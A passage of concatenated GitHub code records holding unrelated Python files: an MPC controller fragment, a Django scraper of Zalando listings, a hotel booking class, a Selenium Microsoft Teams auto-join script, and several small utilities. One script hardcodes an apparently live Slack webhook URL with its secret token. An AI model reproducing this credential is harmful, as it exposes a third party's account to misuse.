np.ndarray, u_ref: np.array) -> None:\n yref = np.vstack((x_ref, u_ref, pee_ref)).flatten()\n yref_e = np.vstack((x_ref, pee_ref)).flatten()\n for stage in range(self.options.n):\n self.acados_ocp_solver.cost_set(stage, \"yref\", yref) \n self.acados_ocp_solver.cost_set(self.options.n, \"yref\", yref_e)\n \n def compute_torques(self, q: np.ndarray, dq: np.ndarray, t:float = None) -> np.ndarray:\n \n # set initial state\n xcurrent = np.vstack((q, dq))\n self.acados_ocp_solver.set(0, \"lbx\", xcurrent)\n self.acados_ocp_solver.set(0, \"ubx\", xcurrent)\n\n # solve the OCP\n status = self.acados_ocp_solver.solve()\n \n self.debug_time.append(self.acados_ocp_solver.get_stats(\"time_tot\")[0])\n if status != 0 and status != 2:\n u = np.zeros((self.nu,))\n print(\"no optimal solution\")\n # raise RuntimeError('acados returned status {} in time step {}.'.format(status, self.iteration_conuter))\n \n else: \n # get solution\n u = self.acados_ocp_solver.get(0, \"u\")\n \n self.iteration_conuter += 1\n \n return u\n \n ","repo_name":"wenxin0917/Imitation-Learning-of-MPC-for-LBR-iiwa-14","sub_path":"mpc_controller/mpc.py","file_name":"mpc.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25990328530","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\nimport requests\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nimport random\n\nfrom scraper.models import Recherche\nfrom scraper.models import Articles\n\ndef saveArticle(a_desc,a_titre,aprix,acouleur,tail,a_id,key, url, aimg):\n\n\ttry:\n\t\tis_article = Articles.objects.get(aliens=a_id)\n\texcept Articles.DoesNotExist:\n\t\tis_article = 0\n\n\tif is_article != 0:\n\t\t\n\t\t# Modifier\n\t\tis_article.emarque = a_desc\n\t\tis_article.adescription = a_titre\n\t\tis_article.aprix = aprix\n\t\tis_article.acouleur = 'Red Black'\n\t\tis_article.atail = '30 35 38'\n\t\tis_article.aliens=a_id\n\t\tis_article.acles=key \n\t\tis_article.asource=url\n\t\tis_article.aimg=aimg\n\t\t# Enregistrer\n\t\tis_article.save()\n\n\telse:\n\n\t\t# Ajouter\n\t\tarticles = Articles(emarque=a_desc,adescription=a_titre,aprix=aprix,acouleur='Bleu Red',atail='M XL',aliens=a_id,acles=key, asource=url, aimg=aimg)\n\t\t# Enregistrer\n\t\tarticles.save()\n\n\ndef getData(key):\n\turl = 'https://www.zalando.fr/homme/?q='+key+'&p=94'\n\theaders={'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'}\n\tresponse = requests.get(url, headers=headers)\n\tif response.status_code == 200:\n\t\t\n\t\tsoup = BeautifulSoup(response.text, \"html.parser\")\n\t\t\n\t\tquotes =[] # a list to store quotes \n\t\ttry:\n\n\t\t\ttable = soup.find('z-grid', attrs = {'class':'cat_catArticles-2Pxh7'}) \n\t\t\tcompt = 1\n\t\t\tfor row in table.findAll('z-grid-item', attrs = {'class':'cat_articleCard-1r8nF cat_normalWidth-tz8JR'}): \n\t\t\t\tquote = {} \n\t\t\t\t\n\t\t\t\ta_url = 'http://127.0.0.1:8000/detail'+row.a['href'].replace('.html', '')\n\t\t\t\tquote['url'] = a_url\n\t\t\t\t\t\n\t\t\t\ta_img = row.img['src'] \n\t\t\t\tquote['img'] = a_img\n\n\t\t\t\ta_id = row.a['href'].replace('.html', '')\n\t\t\t\tquote['id'] = a_id\n\n\t\t\t\ta_desc = row.find('div', attrs = {'class':'cat_articleName--arFp cat_ellipsis-MujnT'}).get_text() \n\t\t\t\tquote['desc'] = a_desc\n\n\n\t\t\t\tprix = row.find('div', attrs = {'class':'cat_prices-2-Zhx'}).text.split(',')\n\t\t\t\t\n\n\t\t\t\ta_titre = row.find('div', attrs = {'class':'cat_brandName-2XZRz cat_ellipsis-MujnT'}).text\n\t\t\t\tquote['titre'] = a_titre\n\t\t\t\t\n\t\t\t\tif prix[0].isdigit() :\n\t\t\t\t\tquote['prix'] = nanPrix(prix[0])\n\t\t\t\t\tquotes.append(quote)\n\t\t\t\t\tsaveArticle(a_desc,a_titre,nanPrix(prix[0]),'Bleu Red','M XL',a_id,key,url,a_img) \n\t\t\t\t\t\n\t\t\t\tcompt += 1\n\n\t\t\trecherche = Recherche(rmot=key, rsite='https://www.zalando.fr/homme/')\n\t\t\trecherche.save()\n\t\t\treturn quotes\n\t\texcept:\n\t\t\tall_articles = Articles.objects.filter(acles__contains=key)\n\t\t\tfor articles in all_articles:\n\n\t\t\t\tquote = {} \n\t\t\t\tquote['prix'] = articles.aprix\n\t\t\t\tquote['url'] = articles.aliens\n\t\t\t\tquote['img'] = articles.aimg\n\t\t\t\tquote['id'] = articles.aliens\n\t\t\t\tquote['desc'] = articles.emarque\n\t\t\t\tquote['titre'] = articles.adescription\n\t\t\t\tquotes.append(quote)\n\n\t\t\trecherche = Recherche(rmot=key, rsite='https://www.zalando.fr/homme/')\n\t\t\trecherche.save()\n\t\t\treturn quotes\n\n\telse:\n\n\t\treturn quotes\n\n\ndef getDetail(url):\n\t\n\tr = requests.get(url)\n\tc = r.content.decode('utf-8')\n\tsoup = BeautifulSoup(c,\"html.parser\")\n\n\treturn soup\n\n\t\n\n\n\ndef home(req):\n\tmot = 'chemises'\n\tfoo = ['Sneakers', 'Chemises', 'Costumes', 'Skate shoes', 'Derbies & Richelieu', 'Baskets']\n\tmotchoix = random.choice(foo)\n\tquotes = getData(motchoix)\n\treturn render(req, 'home-page.html', {'liens':quotes})\n\n\ndef detail(req, liens):\n\tkeis = liens\n\tquote = []\n\tliens = 'https://www.zalando.fr/'+liens+'.html'\n\ttry:\n\n\t\tdonnes = getDetail(liens)\n\t\timgc = donnes.find('img',attrs={\"id\":\"galleryImage-0\"})\n\t\timg = imgc['src']\n\n\t\ttitre = donnes.find('h2',attrs={\"class\":\"h-text h-color-black detail h-p-bottom-xs h-bold\"}).text\n\t\tdesc = donnes.find('h1',attrs={\"class\":\"h-text h-color-black title-typo h-clamp-2\"}).text\n\t\trecprix = donnes.find('div',attrs={\"class\":\"h-text h-color-black title-typo h-p-top-m\"}).text.split(',')\n\t\tprix = (int(recprix[0]) + 1) * 650 \n\n\t\tquote = {} \n\t\tquote['recprix'] = prix\n\t\tquote['url'] = liens\n\t\tquote['img'] = img\n\t\tquote['key'] = keis\n\t\tquote['desc'] = desc\n\t\tquote['titre'] = titre\n\t\tquotes.append(quote)\n\n\texcept:\n\t\ttry:\n\t\t\tarticles = Articles.objects.get(aliens=keis)\n\t\t\tquote = {}\n\t\t\tquote['url'] = articles.aliens\n\t\t\tquote['recprix'] = articles.aprix\n\t\t\tquote['img'] = articles.aimg\n\t\t\tquote['key'] = articles.aliens\n\t\t\tquote['desc'] = articles.emarque\n\t\t\tquote['titre'] = articles.adescription\n\t\t\tquotes.append(quote)\n\t\texcept Articles.DoesNotExist:\n\t\t\tquote = {}\n\treturn render(req, 'pages/product-page.html', {'detail':quotes})\n\t\ndef checkout(req):\n\treturn render(req, 'pages/checkout-page.html')\n\n\n\ndef result(req):\n\n\tq = req.GET.get('q')\n\tif (q):\n\t\tmessage = getData(q)\n\telse:\n\t\tmessage = 'costumes'\n\n\t\n\treturn render(req, 'pages/result-page.html', {'resultats':message})\n\n\n\n\ndef about(req):\n\treturn render(req, 'pages/about.html')\n\n\ndef contact(req):\n\treturn render(req, 'pages/contact.html')\n\n\ndef nanPrix(prix_euro):\n\ttaux = 50\n\tpct = 100\n\tapli_taux = 1\n\n\ttaux_cfa = 656\n\n\tmontaux = apli_taux + (taux/pct)\n\n\tprix_fin = (prix_euro * taux_cfa) * montaux\n\n\treturn prix_fin","repo_name":"Soro08/ecommerce","sub_path":"ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"32898113937","text":"from typing import List,IO, Union\nfrom Keycard import Keycard\nfrom Room import Room\nfrom Guest import Guest\nfrom GuestRecord import GuestRecord\nfrom ErrorCase import CannotBook, CannotBookAllFloor, CannotCheckout, FloorNotFound, GuestNotFound, KeycardNotAssign, KeycardNotFound, NoKeycardAvailable, RoomNotFound, WrongSymbol\n\nclass Hotel:\n \n def __init__(self, floor_count: int, room_count_per_floor: int) -> None: \n self.create_rooms(floor_count, room_count_per_floor)\n self.create_keycards(floor_count, room_count_per_floor) \n self.guest_records = []\n\n def __generate_room_numbers(self, floor_count: int, room_count_per_floor: int) -> List[int]:\n temp_room_numbers = list(range(1, room_count_per_floor + 1))\n floor_numbers = list(range(1, floor_count + 1))\n room_numbers = [room_number + (floor_number * 100) for room_number in temp_room_numbers for floor_number in floor_numbers]\n \n return room_numbers\n\n def __generate_keycard_numbers(self, floor_count: int, room_count_per_floor: int) -> List[int]:\n keycard_count = floor_count * room_count_per_floor\n keycard_numbers = list(range(1, keycard_count + 1))\n\n return keycard_numbers\n\n def create_keycards(self, floor_count: int, room_count_per_floor: int) -> None:\n keycard_numbers = self.__generate_keycard_numbers(floor_count, room_count_per_floor)\n self.keycards = list(map(lambda keycard_number: Keycard(str(keycard_number)), keycard_numbers)) \n\n def create_rooms(self, floor_count: int, room_count_per_floor: int) -> None:\n room_numbers = self.__generate_room_numbers(floor_count, room_count_per_floor)\n self.rooms = list(map(lambda room_number: Room(str(room_number // 100), str(room_number)), room_numbers))\n\n def get_keycard_by_keycard_number(self, keycard_number: str) -> Keycard:\n keycards = list(filter(lambda keycard: keycard.number == keycard_number, self.keycards))\n \n if(not keycards):\n raise KeycardNotFound(keycard_number)\n\n return keycards[0]\n \n def get_available_keycard(self) -> Keycard:\n used_keycards = list(map(lambda record: record.keycard, self.guest_records))\n available_keycards = list(filter(lambda keycard: keycard not in used_keycards, self.keycards))\n \n if(not available_keycards):\n raise NoKeycardAvailable()\n\n return available_keycards[0]\n\n def get_room_by_room_number(self, room_number: str) -> Room: \n rooms = list(filter(lambda room: room.number == room_number, self.rooms))\n \n if(not rooms):\n raise RoomNotFound(room_number)\n \n return rooms[0]\n\n def get_guest_by_room_number(self, room_number: str) -> Guest:\n room = self.get_room_by_room_number(room_number)\n guest_records = list(filter(lambda record: record.room == room, self.guest_records))\n \n if(not guest_records):\n raise GuestNotFound(room_number)\n \n return guest_records[0].guest\n \n def get_guest_record_by_room_number(self, room_number: str) -> Union[GuestRecord, None]:\n room = self.get_room_by_room_number(room_number)\n guest_records = list(filter(lambda record: record.room == room, self.guest_records))\n \n if(not guest_records):\n return None\n \n return guest_records[0]\n\n def get_guest_record_by_keycard_number(self, keycard_number: str) -> Union[GuestRecord, None]:\n keycard = self.get_keycard_by_keycard_number(keycard_number)\n guest_records = list(filter(lambda record: record.keycard == keycard, self.guest_records)) \n \n if(not guest_records):\n return None\n \n return guest_records[0]\n\n def list_room_by_floor_number(self, floor_number: str) -> List[Room]:\n rooms = list(filter(lambda room: room.floor_number == floor_number, self.rooms))\n \n if(not rooms):\n raise FloorNotFound(floor_number)\n \n return rooms\n\n def book(self, room_number: str, guest: Guest) -> GuestRecord:\n guest_record = self.get_guest_record_by_room_number(room_number)\n \n if(guest_record): \n raise CannotBook(room_number, guest, guest_record)\n \n room = self.get_room_by_room_number(room_number)\n keycard = self.get_available_keycard()\n new_guest_record = GuestRecord(guest, room, keycard)\n self.guest_records.append(new_guest_record)\n \n return new_guest_record\n \n def list_available_room(self) -> List[Room]: \n booked_rooms = list(map(lambda record: record.room, self.guest_records))\n available_rooms = list(filter(lambda room: room not in booked_rooms, self.rooms))\n\n return available_rooms\n\n def checkout(self, keycard_number: str, guest_name: str) -> GuestRecord:\n guest_record = self.get_guest_record_by_keycard_number(keycard_number)\n \n if(not guest_record):\n raise KeycardNotAssign()\n\n if(guest_record.guest.name != guest_name):\n raise CannotCheckout(guest_record, keycard_number)\n \n self.guest_records.remove(guest_record)\n\n return guest_record\n\n def list_guest(self) -> List[Guest]:\n return list(map(lambda record: record.guest, self.guest_records))\n \n def list_guest_by_age(self, comparison_symbol: str, age: int) -> List[Guest]:\n if(comparison_symbol == '<'):\n guest_records = list(filter(lambda record: record.guest.age < age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n\n elif(comparison_symbol == '>'):\n guest_records = list(filter(lambda record: record.guest.age > age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '>='):\n guest_records = list(filter(lambda record: record.guest.age >= age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '<='):\n guest_records = list(filter(lambda record: record.guest.age <= age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '!='):\n guest_records = list(filter(lambda record: record.guest.age != age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n \n elif(comparison_symbol == '='):\n guest_records = list(filter(lambda record: record.guest.age == age, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n else:\n raise WrongSymbol()\n\n return guests\n\n def list_guest_by_floor_number(self, floor_number: str) -> List[Guest]:\n rooms = self.list_room_by_floor_number(floor_number)\n guest_records = list(filter(lambda record: record.room in rooms, self.guest_records))\n guests = list(map(lambda record: record.guest, guest_records))\n\n return guests\n\n def checkout_by_floor_number(self, floor_number: str) -> List[GuestRecord]:\n rooms = self.list_room_by_floor_number(floor_number)\n guest_records = list(filter(lambda record: record.room in rooms, self.guest_records))\n checkouted_guest_records = list(map(lambda record: self.checkout(record.keycard.number, record.guest.name), guest_records))\n\n return checkouted_guest_records\n\n def book_by_floor_number(self, floor_number: str, guest: Guest) -> List[GuestRecord]:\n rooms = self.list_room_by_floor_number(floor_number)\n guest_records = list(filter(lambda record: record.room in rooms, self.guest_records))\n \n if(guest_records):\n raise CannotBookAllFloor(floor_number, guest)\n\n new_guest_records = list(map(lambda room: self.book(room.number, guest), rooms))\n \n return new_guest_records\n","repo_name":"DotDot-011/aqoda_learning","sub_path":"Hotel.py","file_name":"Hotel.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74553936362","text":"import json\nimport time\nimport datetime\n\nimport selenium\nfrom selenium import webdriver\nfrom selenium.webdriver import ChromeOptions, Chrome\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By \nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nclass Teams:\n def __init__(self):\n\n self.opts = ChromeOptions()\n self.opts.add_experimental_option(\"detach\", True)\n self.opts.add_argument('--ignore-certificate-errors')\n self.opts.add_argument('--ignore-ssl-errors')\n self.opts.add_argument(\"--use-fake-ui-for-media-stream\")\n\n self.browser = Chrome( executable_path='Chrome-Driver/V83/chromedriver' ,chrome_options=self.opts)\n\n self.link = 'https://www.microsoft.com/en-in/microsoft-365/microsoft-teams/group-chat-software'\n self.x = 1600\n self.y = 1600\n\n self.sign_in = 'mectrl_main_trigger'\n self.login_id = 'i0116'\n self.password_id = 'i0118'\n self.btn_class = 'inline-block'\n self.popup_id = 'use-app-lnk'\n self.team_name_id = 'team-name-text'\n self.meeting_class = 'ts-sym ts-btn ts-btn-primary inset-border icons-call-jump-in ts-calling-join-button app-title-bar-button app-icons-fill-hover call-jump-in'\n\n\n def start_window(self):\n\n\n self.browser.set_window_size(self.x , self.y)\n self.browser.get(self.link)\n \n login_href = WebDriverWait(self.browser, 10).until(\n EC.presence_of_element_located((By.ID, self.sign_in))\n )\n\n login_href.click()\n\n\n def add_credentials(self):\n with open('assets/credentials.json') as json_data:\n credentials = json.load(json_data)\n\n email_field = WebDriverWait(self.browser, 10).until(\n EC.presence_of_element_located((By.ID, self.login_id))\n )\n email_field.send_keys(credentials['email'] , Keys.ENTER)\n time.sleep(10)\n password_field = WebDriverWait(self.browser, 10).until(\n EC.presence_of_element_located((By.ID, self.password_id))\n )\n password_field.send_keys(credentials['password'])\n\n time.sleep(5)\n submit_btn = self.browser.find_element_by_class_name(self.btn_class).click()\n\n\n def popup_login(self):\n\n submit_btn = self.browser.find_element_by_class_name(self.btn_class)\n submit_btn.click()\n\n\n def popup_ad(self):\n\n web_app_btn = self.browser.find_element_by_class_name(self.popup_id)\n web_app_btn.click()\n\n def join_group(self , class_name):\n \n all_user_groups = WebDriverWait(self.browser, 20).until(\n EC.presence_of_element_located((By.CLASS_NAME, self.team_name_id))\n )\n all_user_groups = self.browser.find_elements_by_class_name(self.team_name_id)\n\n for group in range(0 ,len(all_user_groups)):\n if all_user_groups[group].text.lower() == class_name.lower():\n all_user_groups[group].click()\n break\n \n\n def mute_audio(self):\n \n audio_btn = self.browser.find_element_by_css_selector(\"toggle-button[data-tid='toggle-mute']>div>button\")\n audio_is_on = audio_btn.get_attribute(\"aria-pressed\")\n if audio_is_on == \"true\":\n audio_btn.click()\n\n def close_video(self):\n \n video_btn = self.browser.find_element_by_css_selector(\"toggle-button[data-tid='toggle-video']>div>button\")\n video_is_on = video_btn.get_attribute(\"aria-pressed\")\n if video_is_on == \"true\":\n video_btn.click()\n\n\n def join_meeting(self):\n\n time.sleep(20)\n\n try:\n meeting_button = WebDriverWait(self.browser, 30).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR,\"button[ng-click='ctrl.joinCall()']\"))\n )\n except selenium.common.exceptions.TimeoutException:\n print(\"Couldn't load the link or Maybe meeting has not been started yet .\")\n \n else:\n time.sleep(20)\n\n meeting_button.click()\n\n time.sleep(20)\n\n self.mute_audio()\n self.close_video()\n\n join_button = WebDriverWait(self.browser, 30).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR,\"div.flex-fill.input-section > div > div > button\"))\n )\n\n join_button.click()\n\n #click form needs modification\n # def click_form(self):\n # form_btn = WebDriverWait(self.browser, 40).until(\n # EC.presence_of_element_located((By.CSS_SELECTOR,\" div > div > label:nth-child(1)\"))\n # )\t\n # time.sleep(10)\n # form_btn.click()\n # vote_sub=WebDriverWait(self.browser, 40).until(\n # EC.presence_of_element_located((By.CSS_SELECTOR,\" div.card-body > div > div:nth-child(5) > div:nth-child(1) > div > button\"))\n # )\n # vote_sub.click()\n \n def min_window(self):\n \tWebDriverWait(self.browser, 20).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '#app-bar-2a84919f-59d8-4441-a975-2a8c2643b741'))\n ).click()\n\n # def get_time(self):\n \t\n # \ttime =WebDriverWait(self.browser, 30).until(\n # EC.presence_of_element_located((By.CSS_SELECTOR,\"calling-duration > span\"))\n # )\n # \tcurr_time=time.text()\n\n def getchats(self):\n \n chats=[]\n for chat in self.browser.find_elements_by_css_selector('message-list > div > virtual-repeat > div'):\t\n message = chat.find_element_by_css_selector(\"#messageBody > div:nth-child(2) > see-more > div > div > div\").get_attribute('innerHTML')\n obj = json.dumps({'message': message})\n chats.append(json.loads(obj))\n \n print(chats)\n\n \n\n def hang_call(self):\n hangup_btn = WebDriverWait(self.browser, 30).until(\n EC.presence_of_element_located((By.CSS_SELECTOR,\"button[data-tid='call-hangup']\"))\n )\n time.sleep(20)\n hangup_btn.click() \n \n\n\n\n\ndef main():\n\n t1 = Teams()\n\n # with open('assets/agenda.json') as json_data:\n # agenda = json.load(json_data)\n \n t1.start_window()\n t1.add_credentials()\n t1.popup_login()\n t1.popup_ad()\n t1.join_group('own') # For example\n t1.join_meeting()\n t1.min_window()\n t1.getchats()\n # t1.click_form()\n\n t1.hang_call()\n \n\nif __name__ == \"__main__\":\n main()\n\n#es-bottom-overlay","repo_name":"aryanshridhar/MS-Teams-Automation","sub_path":"automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"11918147578","text":"def solution(n, stairs):\n solutions = [(stairs[0], -1)] # (, )\n\n if stairs[0] > 0:\n solutions.append((stairs[0] + stairs[1], 0))\n else:\n solutions.append((stairs[1], -1))\n\n for i in range(2, len(stairs)):\n if solutions[i - 1][0] > solutions[i - 2][0]:\n solutions.append((solutions[i - 1][0] + stairs[i], i - 1))\n else:\n solutions.append((solutions[i - 2][0] + stairs[i], i - 2))\n\n result_sum = solutions[-1][0]\n current_step = solutions[-1][1]\n steps = [n - 1]\n while current_step != -1:\n steps.append(current_step)\n current_step = solutions[current_step][1]\n\n steps.reverse()\n\n return result_sum, steps\n\n\nn = int(input())\nstairs = [int(x) for x in input().split()]\n\nsum, steps = solution(n, stairs)\nprint(sum)\nprint(' '.join(map(lambda x: str(x + 1), steps)))\n\n","repo_name":"obabichev/acmp-py","sub_path":"acmp/dynamic/329.py","file_name":"329.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36760200832","text":"def send_message_to_slack(text):\n from urllib import request, parse\n import json\n\n post = {\"text\": \"{0}\".format(text)}\n\n try:\n json_data = json.dumps(post)\n req = request.Request(\"https://hooks.slack.com/services/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\",\n data=json_data.encode('ascii'),\n headers={'Content-Type': 'application/json'})\n resp = request.urlopen(req)\n except Exception as em:\n print(\"EXCEPTION: \" + str(em))\n\nsend_message_to_slack('Docker Pipeline is completed...................')","repo_name":"kavya02703/petclinic","sub_path":"slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24154763822","text":"import os\npath = r'/home/kushaldulani/Finito/Dataset/Annotated/cinthol-labels-1/'\n\n\nfor ft in os.listdir(path):\n print(ft)\n f=open(path+ft,'r+')\n t=f.read()\n lst = t.split(\"\\n\")\n lst = list(filter(None,lst))\n for i in range(len(lst)):\n p_list = lst[i].split()\n el =p_list[0]\n if el==\"6\":\n p_list[0] =\"1\"\n lst[i] = \" \".join(p_list) \n new =\"\\n\".join(lst) \n f.close()\n f=open(path+ft,\"w+\")\n f.write(new)\n f.close()\n","repo_name":"kushu9999/All-Scripts","sub_path":"yolo-index-changer.py","file_name":"yolo-index-changer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23670504806","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom EvaluateHub.serializers import IssueSerializer, ResponseSerializer, ClassRecordSerializer,MaterialSerializer, SecurityFactorsSerializer\nfrom EvaluateHub.models import *\nfrom EvaluateHub.utils import create_response_if_not_empty, update_response_if_not_empty\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass AdminStudentsAffairsSerializer(ModelSerializer):\n first_class = ClassRecordSerializer(read_only =True)\n second_class = ClassRecordSerializer(read_only =True)\n third_class = ClassRecordSerializer(read_only =True)\n fourth_class = ClassRecordSerializer(read_only =True)\n fifth_class = ClassRecordSerializer(read_only =True)\n sixth_class = ClassRecordSerializer(read_only =True)\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer()\n class Meta:\n model = StudentsAffairs\n fields = ['id','first_class','second_class','third_class','fourth_class','fifth_class','sixth_class','transfers_to_school','transfers_from_school','transferred_files', 'issue','response']\n read_only_fields = ['id','first_class', 'transfers_to_school', 'transfers_from_school', 'transferred_files']\n\n\nclass AdminSecuritySafetySerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n security_factors = SecurityFactorsSerializer(read_only =True)\n class Meta:\n model = SecuritySafety\n fields = ['id','labs','cabins', 'building','wall','external_factors','security_factors', 'issue','response']\n read_only_fields = ['id','labs','cabins', 'building','wall','external_factors','security_factors', 'issue']\n\nclass AdminTeachersSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n material_one = MaterialSerializer(read_only =True)\n material_two = MaterialSerializer(read_only =True)\n material_three = MaterialSerializer(read_only =True)\n material_four = MaterialSerializer(read_only =True)\n material_five = MaterialSerializer(read_only =True)\n material_six = MaterialSerializer(read_only =True)\n material_seven = MaterialSerializer(read_only =True)\n material_eight = MaterialSerializer(read_only =True)\n material_nine = MaterialSerializer(read_only =True)\n material_ten = MaterialSerializer(read_only =True)\n material_eleven = MaterialSerializer(read_only =True)\n material_twelve = MaterialSerializer(read_only =True)\n class Meta:\n model = Teachers\n fields = ['material_one', 'material_two', 'material_three', 'material_four', 'material_five', 'material_five', 'material_six', 'material_seven', 'material_eight', 'material_nine', 'material_ten', 'material_eleven', 'material_twelve', 'issue', 'response'] \n\nclass AdminStrategicPlanningSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = StrategicPlanning\n fields = ['id', 'obstacles', 'plan_activation','team_building','plan','analysis','issue', 'response']\n read_only_fields = ['id', 'obstacles', 'plan_activation','team_building','plan','analysis','issue']\n\nclass AdminAdministrationSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Administration\n fields = ['id' ,'execution_plan','team_building','analysis','activities_activation','obstacles','predicted_crisis','communication_system','risks_indicators','plan','training_on_plan', 'issue', 'response']\n read_only_fields = ['id' ,'execution_plan','team_building','analysis','activities_activation','obstacles','predicted_crisis','communication_system','risks_indicators','plan','training_on_plan', 'issue']\n\nclass AdminQualitySerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Quality\n fields = ['id','first_year_one', 'second_year_one', 'third_year_one', 'fourth_year_one', 'fifth_year_one', 'sixth_year_one', 'first_year_two', 'second_year_two', 'third_year_two', 'fourth_year_two', 'fifth_year_two', 'sixth_year_two', 'first_year_three', 'second_year_three', 'third_year_three', 'fourth_year_three', 'fifth_year_three', 'sixth_year_three', 'issue', 'response']\n read_only_fields = ['id','first_year_one', 'second_year_one', 'third_year_one', 'fourth_year_one', 'fifth_year_one', 'sixth_year_one', 'first_year_two', 'second_year_two', 'third_year_two', 'fourth_year_two', 'fifth_year_two', 'sixth_year_two', 'first_year_three', 'second_year_three', 'third_year_three', 'fourth_year_three', 'fifth_year_three', 'sixth_year_three', 'issue']\n\nclass AdminWorkersAffairsSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = WorkersAffairs\n fields = ['id', 'registered', 'present','absent', 'negatives', 'issue', 'response']\n read_only_fields = ['id', 'registered', 'present','absent', 'negatives', 'issue']\n\nclass AdminTrainingSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Training\n fields = ['id', 'teachers_training', 'training_plan','training_plan_activation', 'issue', 'response']\n read_only_fields = ['id', 'teachers_training', 'training_plan','training_plan_activation', 'issue']\n\nclass AdminNutritionSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Nutrition\n fields = ['id', 'daily_received', 'daily_served','disciplined_distribution','health_certificate', 'not_stored_periods', 'issue', 'response']\n read_only_fields = ['id', 'daily_received', 'daily_served','disciplined_distribution','health_certificate', 'not_stored_periods', 'issue']\n\nclass AdminDecentralizationSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Decentralization\n fields = ['id', 'board_of_trustees', 'decentralization_committee','settlement', 'exchange', 'plan' ,'append','issue', 'response']\n read_only_fields=['id', 'board_of_trustees', 'decentralization_committee','settlement', 'exchange', 'plan' ,'append','issue']\n\nclass AdminCooperativeSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Cooperative\n fields = ['id','existing_authorized_items','drag_running' , 'drag_profits', 'issue', 'response' ]\n read_only_fields = ['id','existing_authorized_items','drag_running' , 'drag_profits', 'issue' ]\n\nclass AdminLaboratoriesSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = Laboratories\n fields = ['id', 'work_validity','ory_association','networks','computers','evaluation', 'tilo', 'issue', 'response']\n read_only_fields = ['id', 'work_validity','networks','computers','evaluation', 'tilo', 'issue']\n\nclass AdminProductionUnitSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = ProductionUnit\n fields = ['id', 'profit_distribution','supply','activation','certified','issue', 'response']\n read_only_fields = ['id', 'profit_distribution','supply','activation','certified','issue']\n\nclass AdminEnvironmentPopulationSerializer(ModelSerializer):\n issue = IssueSerializer(read_only =True)\n response = ResponseSerializer() \n class Meta:\n model = EnvironmentPopulation\n fields = ['id', 'toilets_health_procedures','health_file','diagnosis_health_plan','check_health_plan','activities' ,'labs_health_procedures','issue', 'response']\n read_only_fields = ['id', 'toilets_health_procedures','health_file','diagnosis_health_plan','check_health_plan','activities' ,'labs_health_procedures','issue']\n\nclass AdminStudentsEvaluationFormSerializer(ModelSerializer):\n students_affairs = AdminStudentsAffairsSerializer()\n class Meta:\n model = EvaluationForm\n fields = ['id', 'school_name', 'school_id', 'school_level','students_affairs']\n read_only_fields = ['id', 'school_name', 'school_id', 'school_level']\n\n def update(self, instance, validated_data):\n students_affairs_data = validated_data.pop('students_affairs')\n response_data = students_affairs_data.pop('response')\n students_affairs = StudentsAffairs.objects.get(pk = instance.students_affairs.id)\n print (students_affairs) # update only for the first record in the response table if the table is empty with one record\n try:\n if instance.students_affairs.response:\n #print (instance.students_affairs.response) \n update_response_if_not_empty(response_data, StudentAffairsResponse, students_affairs)\n except ObjectDoesNotExist:\n 